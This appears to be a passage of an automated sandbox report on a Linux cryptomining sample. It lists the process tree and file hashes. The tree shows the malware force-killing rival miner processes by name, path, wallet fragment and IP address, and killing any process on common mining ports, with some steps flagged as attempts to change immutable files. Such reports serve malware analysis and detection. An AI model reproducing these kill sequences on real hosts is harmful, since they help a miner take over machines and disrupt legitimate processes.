PID:910
-
-
/usr/bin/pkillpkill -f linuxsys2⤵
- Reads CPU attributes
PID:911
-
-
/usr/bin/pkillpkill -f kthreaddo2⤵
- Reads CPU attributes
- Reads runtime system information
PID:912
-
-
/usr/bin/pkillpkill -f donkey2⤵
- Reads CPU attributes
- Reads runtime system information
PID:913
-
-
/bin/grepgrep :14142⤵PID:915
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:916
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:917
-
-
/bin/grepgrep -v -2⤵PID:918
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:919
-
-
/bin/grepgrep 127.0.0.1:520182⤵PID:921
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:922
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:923
-
-
/bin/grepgrep -v -2⤵PID:924
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:925
-
-
/bin/grepgrep :1432⤵PID:927
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:928
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:929
-
-
/bin/grepgrep -v -2⤵PID:930
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:931
-
-
/bin/grepgrep :22222⤵PID:933
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:934
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:935
-
-
/bin/grepgrep -v -2⤵PID:936
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:937
-
-
/bin/grepgrep :33332⤵PID:939
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:940
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:941
-
-
/bin/grepgrep -v -2⤵PID:942
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:943
-
-
/bin/grepgrep :33892⤵PID:945
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:946
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:947
-
-
/bin/grepgrep -v -2⤵PID:948
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:949
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:952
-
-
/bin/grepgrep :44442⤵PID:951
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:953
-
-
/bin/grepgrep -v -2⤵PID:954
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:955
-
-
/bin/grepgrep :55552⤵PID:957
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:958
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:959
-
-
/bin/grepgrep -v -2⤵PID:960
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:961
-
-
/bin/grepgrep :66662⤵PID:963
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:964
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:965
-
-
/bin/grepgrep -v -2⤵PID:966
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:967
-
-
/bin/grepgrep :66652⤵PID:969
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:970
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:971
-
-
/bin/grepgrep -v -2⤵PID:972
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:973
-
-
/bin/grepgrep :66672⤵PID:975
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:976
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:977
-
-
/bin/grepgrep -v -2⤵PID:978
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:979
-
-
/bin/grepgrep :77772⤵PID:981
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:982
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:983
-
-
/bin/grepgrep -v -2⤵PID:984
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:985
-
-
/bin/grepgrep :84442⤵PID:987
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:988
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:989
-
-
/bin/grepgrep -v -2⤵PID:990
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:991
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:994
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:995
-
-
/bin/grepgrep :33472⤵PID:993
-
-
/bin/grepgrep -v -2⤵PID:996
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:997
-
-
/bin/grepgrep :144442⤵PID:999
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1000
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1001
-
-
/bin/grepgrep -v -2⤵PID:1002
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1003
-
-
/bin/grepgrep :144332⤵PID:1005
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1006
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1007
-
-
/bin/grepgrep -v -2⤵PID:1008
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1009
-
-
/bin/grepgrep :135312⤵PID:1011
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1012
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1013
-
-
/bin/grepgrep -v -2⤵PID:1014
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1015
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1017
-
-
/bin/catcat /tmp/.X11-unix/012⤵PID:1016
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1019
-
-
/bin/catcat /tmp/.X11-unix/112⤵PID:1018
-
-
/bin/catcat /tmp/.X11-unix/222⤵PID:1020
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1021
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1022
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1023
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1024
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1025
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1027
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1026
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1028
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1029
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1030
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1032
-
-
/bin/catcat /tmp/.pg_stat.02⤵PID:1031
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1034
-
-
/bin/catcat /tmp/.pg_stat.12⤵PID:1033
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1036
-
-
/bin/catcat /data/./oka.pid2⤵PID:1035
-
-
/usr/bin/pkillpkill -f 80.211.206.1052⤵
- Reads CPU attributes
- Reads runtime system information
PID:1037
-
-
/usr/bin/pkillpkill -f 207.38.87.62⤵
- Reads CPU attributes
PID:1038
-
-
/usr/bin/pkillpkill -f p84442⤵
- Reads CPU attributes
PID:1039
-
-
/usr/bin/pkillpkill -f supportxmr2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1040
-
-
/usr/bin/pkillpkill -f monero2⤵
- Reads CPU attributes
PID:1041
-
-
/usr/bin/pkillpkill -f zsvc2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1042
-
-
/usr/bin/pkillpkill -f pdefenderd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1043
-
-
/usr/bin/pkillpkill -f updatecheckerd2⤵
- Reads CPU attributes
PID:1044
-
-
/usr/bin/pkillpkill -f cruner2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1045
-
-
/usr/bin/pkillpkill -f dbused2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1046
-
-
/usr/bin/pkillpkill -f bashirc2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1047
-
-
/usr/bin/pkillpkill -f meminitsrv2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1048
-
-
/usr/bin/pkillpkill -f kthreaddi2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1049
-
-
/usr/bin/pkillpkill -f srv002⤵
- Reads CPU attributes
- Reads runtime system information
PID:1050
-
-
/usr/bin/pkillpkill -f /tmp/.javae/javae2⤵
- Reads CPU attributes
PID:1051
-
-
/usr/bin/pkillpkill -f .javae2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1052
-
-
/usr/bin/pkillpkill -f .syna2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1053
-
-
/usr/bin/pkillpkill -f .main2⤵
- Reads CPU attributes
PID:1054
-
-
/usr/bin/pkillpkill -f xmm2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1055
-
-
/usr/bin/pkillpkill -f solr.sh2⤵
- Reads CPU attributes
PID:1056
-
-
/usr/bin/pkillpkill -f /tmp/.solr/solrd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1057
-
-
/usr/bin/pkillpkill -f /tmp/javac2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1058
-
-
/usr/bin/pkillpkill -f /tmp/.go.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1059
-
-
/usr/bin/pkillpkill -f /tmp/.x/agetty2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1060
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1061
-
-
/usr/bin/pkillpkill -f c3pool2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1062
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/gitag-ssh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1063
-
-
/usr/bin/pkillpkill -f /tmp/12⤵
- Reads CPU attributes
- Reads runtime system information
PID:1064
-
-
/usr/bin/pkillpkill -f /tmp/okk.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1065
-
-
/usr/bin/pkillpkill -f /tmp/gitaly2⤵
- Reads CPU attributes
PID:1066
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1067
-
-
/usr/bin/pkillpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB2⤵
- Reads CPU attributes
PID:1068
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/supervise2⤵
- Reads CPU attributes
PID:1069
-
-
/usr/bin/pkillpkill -f /tmp/.ssh/redis.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1070
-
-
/bin/psps aux2⤵PID:1071
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5B
MD5727479ef7cedf30c03459bec7d87b0f0
SHA12082e7f715f058acab2398d25d135cf5f4c0ce41
SHA25629872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6
SHA5124cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba
-
Filesize
175B
MD55e3e9c99fc365b65ec9d6e8a942c5995
SHA1ae3cc7cd4675a839918b675f635709f300fc5685
SHA25636cb246b517544eae14c6e160be7b54e5c4446b8f334d47d1371cd5f9b297dea
SHA5123df91953f5b56f4dd6919f8c112c98e6852ae6960a1ed8dc9dc6d9a50e4de848d05da7a43c8d395b0c632119d66ad41474aa20183e64adba8cc5e5df8e6d8c54
-
Filesize
175B
MD55e3e9c99fc365b65ec9d6e8a942c5995
SHA1ae3cc7cd4675a839918b675f635709f300fc5685
SHA25636cb246b517544eae14c6e160be7b54e5c4446b8f334d47d1371cd5f9b297dea
SHA5123df91953f5b56f4dd6919f8c112c98e6852ae6960a1ed8dc9dc6d9a50e4de848d05da7a43c8d395b0c632119d66ad41474aa20183e64adba8cc5e5df8e6d8c54
-
Filesize
175B
MD55e3e9c99fc365b65ec9d6e8a942c5995
SHA1ae3cc7cd4675a839918b675f635709f300fc5685
SHA25636cb246b517544eae14c6e160be7b54e5c4446b8f334d47d1371cd5f9b297dea
SHA5123df91953f5b56f4dd6919f8c112c98e6852ae6960a1ed8dc9dc6d9a50e4de848d05da7a43c8d395b0c632119d66ad41474aa20183e64adba8cc5e5df8e6d8c54
-
Filesize
175B
MD55e3e9c99fc365b65ec9d6e8a942c5995
SHA1ae3cc7cd4675a839918b675f635709f300fc5685
SHA25636cb246b517544eae14c6e160be7b54e5c4446b8f334d47d1371cd5f9b297dea
SHA5123df91953f5b56f4dd6919f8c112c98e6852ae6960a1ed8dc9dc6d9a50e4de848d05da7a43c8d395b0c632119d66ad41474aa20183e64adba8cc5e5df8e6d8c54
-
Filesize
175B
MD55e3e9c99fc365b65ec9d6e8a942c5995
SHA1ae3cc7cd4675a839918b675f635709f300fc5685
SHA25636cb246b517544eae14c6e160be7b54e5c4446b8f334d47d1371cd5f9b297dea
SHA5123df91953f5b56f4dd6919f8c112c98e6852ae6960a1ed8dc9dc6d9a50e4de848d05da7a43c8d395b0c632119d66ad41474aa20183e64adba8cc5e5df8e6d8c54
-
Filesize
175B
MD55e3e9c99fc365b65ec9d6e8a942c5995
SHA1ae3cc7cd4675a839918b675f635709f300fc5685
SHA25636cb246b517544eae14c6e160be7b54e5c4446b8f334d47d1371cd5f9b297dea
SHA5123df91953f5b56f4dd6919f8c112c98e6852ae6960a1ed8dc9dc6d9a50e4de848d05da7a43c8d395b0c632119d66ad41474aa20183e64adba8cc5e5df8e6d8c54
-
Filesize
175B
MD55e3e9c99fc365b65ec9d6e8a942c5995
SHA1ae3cc7cd4675a839918b675f635709f300fc5685
SHA25636cb246b517544eae14c6e160be7b54e5c4446b8f334d47d1371cd5f9b297dea
SHA5123df91953f5b56f4dd6919f8c112c98e6852ae6960a1ed8dc9dc6d9a50e4de848d05da7a43c8d395b0c632119d66ad41474aa20183e64adba8cc5e5df8e6d8c54
-
Filesize
175B
MD55e3e9c99fc365b65ec9d6e8a942c5995
SHA1ae3cc7cd4675a839918b675f635709f300fc5685
SHA25636cb246b517544eae14c6e160be7b54e5c4446b8f334d47d1371cd5f9b297dea
SHA5123df91953f5b56f4dd6919f8c112c98e6852ae6960a1ed8dc9dc6d9a50e4de848d05da7a43c8d395b0c632119d66ad41474aa20183e64adba8cc5e5df8e6d8c54
-
Filesize
175B
MD55e3e9c99fc365b65ec9d6e8a942c5995
SHA1ae3cc7cd4675a839918b675f635709f300fc5685
SHA25636cb246b517544eae14c6e160be7b54e5c4446b8f334d47d1371cd5f9b297dea
SHA5123df91953f5b56f4dd6919f8c112c98e6852ae6960a1ed8dc9dc6d9a50e4de848d05da7a43c8d395b0c632119d66ad41474aa20183e64adba8cc5e5df8e6d8c54
-
Filesize
175B
MD55e3e9c99fc365b65ec9d6e8a942c5995
SHA1ae3cc7cd4675a839918b675f635709f300fc5685
SHA25636cb246b517544eae14c6e160be7b54e5c4446b8f334d47d1371cd5f9b297dea
SHA5123df91953f5b56f4dd6919f8c112c98e6852ae6960a1ed8dc9dc6d9a50e4de848d05da7a43c8d395b0c632119d66ad41474aa20183e64adba8cc5e5df8e6d8c54
-
Filesize
175B
MD55e3e9c99fc365b65ec9d6e8a942c5995
SHA1ae3cc7cd4675a839918b675f635709f300fc5685
SHA25636cb246b517544eae14c6e160be7b54e5c4446b8f334d47d1371cd5f9b297dea
SHA5123df91953f5b56f4dd6919f8c112c98e6852ae6960a1ed8dc9dc6d9a50e4de848d05da7a43c8d395b0c632119d66ad41474aa20183e64adba8cc5e5df8e6d8c54